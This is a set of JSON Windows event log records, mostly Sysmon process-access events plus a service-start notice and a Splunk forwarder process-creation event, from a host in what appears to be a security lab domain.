{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.580\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.580","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.596\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.596","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.596\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.596","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.596\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.596","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.596\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.596","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.596\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.596","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.596\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.596","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76851,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The UALSVC service entered the running state.","param1":"UALSVC","param2":"running","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.800\r\nProcessGuid: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nProcessId: 4504\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.800","ProcessGuid":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
